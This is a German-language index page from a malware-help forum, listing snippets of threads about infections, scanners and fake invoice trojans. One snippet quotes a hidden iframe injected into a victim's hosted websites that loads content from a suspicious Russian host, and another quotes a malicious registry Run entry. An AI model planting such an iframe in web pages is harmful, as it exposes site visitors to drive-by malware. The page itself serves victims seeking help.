Zurück   Trojaner-Board > Themen

Alles zum Thema: Schadprogramme

  Letzter Beitrag Antworten Hits Forum
Avast C:\Windows\Memory.dmp Infektion: Win32:DCom-f (Expl.)
Schadprogramme - Liebe User! Ich erhalte bei dem Scan mit Avast obige Meldung. Die Datei hat sich problemlos löschen lassen. Die Datei war vom 18.11.2009 um 12.45 Uhr, danach hatte ich auf diesem Laptop meinen ersten Bluescreen (Vista). Ich konnte aber problemlos starten und habe bis jetzt nichts...
Log-Analyse und Auswertung
1und1-Server infiziert gehostete Websites
Schadprogramme - Mehrere meiner bei 1und1 gehosteten Websites wurden infiziert - ein iFrame wurde eingeschleust, der folgendermaßen aussieht: <iframe src="http://xd4.ru:8080/ts/in.cgi?pepsi123" width=125 height=125 style="visibility: hidden"></iframe> Wird eine infizierte Seite aufgerufen, werden Schadprogramme...
Plagegeister aller Art und deren Bekämpfung
FakeBill.CourtCologne UND PremiumSearch bekomm ich nicht los
Schadprogramme - Hallo, ich habe ein System mit Windows XP SP3. seit kurzem ist aufgefallen, das anscheinend zwei Schadprogramme auf dem System hängen. FakeBill.CourtCologne UND PremiumSearch. Diese wurden mit Spybot Search & destroy gefunden, können aber anscheinend nicht gelöscht werden. Spybot fragt...
Mülltonne
PC auf Schadsoftware überprüfen
Schadprogramme - Ich habe AntiVir auf meinem PC (Vista). Da in letzter Zeit öfters die Meldung: ich hätte zu wenig Arbeitsspeicher kommt obwohl ich 2GB habe und lediglich 80 Bilder in ACDSee umbenannt habe, wollte ich mal meinen PC komplett auf möglichs alle Shadsoftware überprüfen. Wie mache ich das am besten,...
Antiviren-, Firewall- und andere Schutzprogramme
Wiederkehrender Registryeintrag
Schadprogramme - Hallo Leute, ich habe da ein immer wiederkehrender Registryeintrag. Wenn ich ihn Lösche ist er im handundrehen wieder da. Die Schadprogramme habe ich schon eliminiert. Könnt Ihr mir helfen, den Eintrag dauerhaft zu eliminieren? Run->BM8f1316c1->Rundll32.exe "C:\WINDOWS\system32\nkiyinvt.dll",s...
Mülltonne
Schadprogramme in Archiven ungefährlich?
Schadprogramme - Hallo, Ich hab mir letztens Gedanken über Würmer in Archiven wie .rar, .zip-Dateien, etc. gemacht, da diese ja häufig via Email versendet werden. Da die meisten Email-Leser bedenkenlos diese öffnen oder meist selbstentpackend sind, ist das meist der GAU für deren Rechner. Theoretisch ist es...
Diskussionsforum
Gibt es noch empfehlenswerte Scanner für Windows 98 SE?
Schadprogramme - Hallo liebe Teilnehmer, aus unterschiedlichen Gründen möchte ich die nächste Zeit noch an meinem alten Windows 98 SE - Rechner festhalten (466 MHz, 128 MB RAM, DSL via Ethernet-Modem). Aber es wird immer schwieriger, noch aktuelle Schutzsoftware zu finden, da bekannte Produkte (Zone Alarm, Avira...
Alles rund um Windows
Trojaner eingefangen/Windowsparition verschwunden
Schadprogramme - Hallo, Erstmal vorne weg, ich kann nur noch über Linux hier posten und meine Windows Partitionen werden auch unter Linux nicht gemountet. Komischerweise auch meine Partion mit der Musiksammlung nicht (liegt auf ntfs). :balla: Mein PC kommt unter Windows nur noch bis zum Anmeldebildschirm danach...
Plagegeister aller Art und deren Bekämpfung
Perfider Versuch
Schadprogramme - Von Thomas_Albrecht @ 10:12 Ein besonders perfider Versuch, einen Trojaner auf fremde Rechner schmuggeln und gleichzeitig die Ängste der Internet-Nutzer schüren zu wollen: Eine Mail, die vorgibt, auf dem heimischen Rechner habe angeblich die zurzeit diskutierte Online-Durchsuchung...
Plagegeister aller Art und deren Bekämpfung
MSN Massanger - Sicherheit
Schadprogramme - Hallo zusammen, Berufbedingt muss ich mir den MSN Massanger Installieren. Nun hört und ließt man ja viel schlechtes darüber! Ich habe vieleicht drei bis vier Leute, mit denen ich schreibe. Mehr sind in meiner Liste nicht drin und kaommen auch nicht rein! Wie kann ich das ganze noch...
Alles rund um Windows
Kostes Kaspkersky jetzt was oder nicht?
Schadprogramme - Servus! Ich habe da mal eine Frage an euch und zwar: Ich habe letztens das Kaspersky Personal Pro bekommen und dachte das kostet was, aber als ich auf diesen Link www.kasperksy.com/de/downloads getoßen bin, habe ich gesehen, dass man sich das einfach downloaden kann! Und jetzt habe ich...
Antiviren-, Firewall- und andere Schutzprogramme
Wechselnder Hintergrund!!
Schadprogramme - Hallo!Tolles Forum! Ich habe mir vor einigen Tagen mehrere Trojaner eingefangen(trotz Kasperky,Pesttrol und Adware SE) Die Trojaner konnte ich mittlerweile mit Mc Affee entfernen. Es werden auch nach weiteren Scans keine weiteren Schadprogramme angezeigt.Die Scans habe ich im abgesicherten Modus...
Plagegeister aller Art und deren Bekämpfung
Gefälschte Ebay Nachricht im Umlauf
Schadprogramme - Gefälschte Ebay-Rechnung im Umlauf 12. Sep 2005, 14:06 Die Antivirenspezialisten aus dem Hause H+BEDV Datentechnik warnen alle Anwender vor dem neuen Trojaner TR/Dldr.Agent.uf. Dieser Trojaner tarnt sich, ähnlich wie seine Vorgänger, als Rechnung – diesmal von Ebay. Er wurde heute Nacht in...
Plagegeister aller Art und deren Bekämpfung
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.